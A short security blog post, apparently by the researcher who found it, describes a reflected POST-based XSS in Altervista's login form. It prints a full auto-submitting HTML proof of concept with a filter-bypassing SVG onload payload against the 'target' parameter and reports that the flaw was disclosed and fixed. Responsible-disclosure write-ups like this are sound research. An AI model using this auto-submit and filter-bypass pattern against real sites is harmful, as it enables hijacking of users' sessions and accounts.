I usually don’t write about XSS issues in websites, but since this was a hard hunt I thought I would write a bit about it. The web application handled user input reasonably well, but I did not give up. After some time I figured out that the “target” parameter in the login form was not properly sanitized and that no CSRF tokens were used in the login process. Therefore I was able to build a successful POST-based XSS exploit.
<html>
<!-- POC by Osanda Malith Jayathissa -->
<body>
  <form id="exploit" action="http://it.altervista.org/cplogin.php?mode=password" method="POST">
    <input type="hidden" name="Azione" value="Lily" />
    <input type="hidden" name="cookieuser" value="1" />
    <input type="hidden" name="nick" value="Collins" />
    <input type="hidden" name="password" value="Loverhersomuch" />
    <input type="hidden" name="target" value="&apos;&quot;--&gt;&lt;svg/onload=prompt(/XSS_Filter_Bypassed/);&gt;" />
    <script>document.getElementById("exploit").submit();</script>
  </form>
</body>
</html>
Once a victim opens the above file, they are redirected to the login page with our payload. Note that the payload executes in the middle of the redirect to the other page. The page also had a weak filter, which was easy to bypass.
I reported this to the Altervista team and the issue has been resolved by now. As a fix, the POST parameter is now converted to HTML entities before it is reflected.
For my responsible disclosure, my name was published in the Credits section.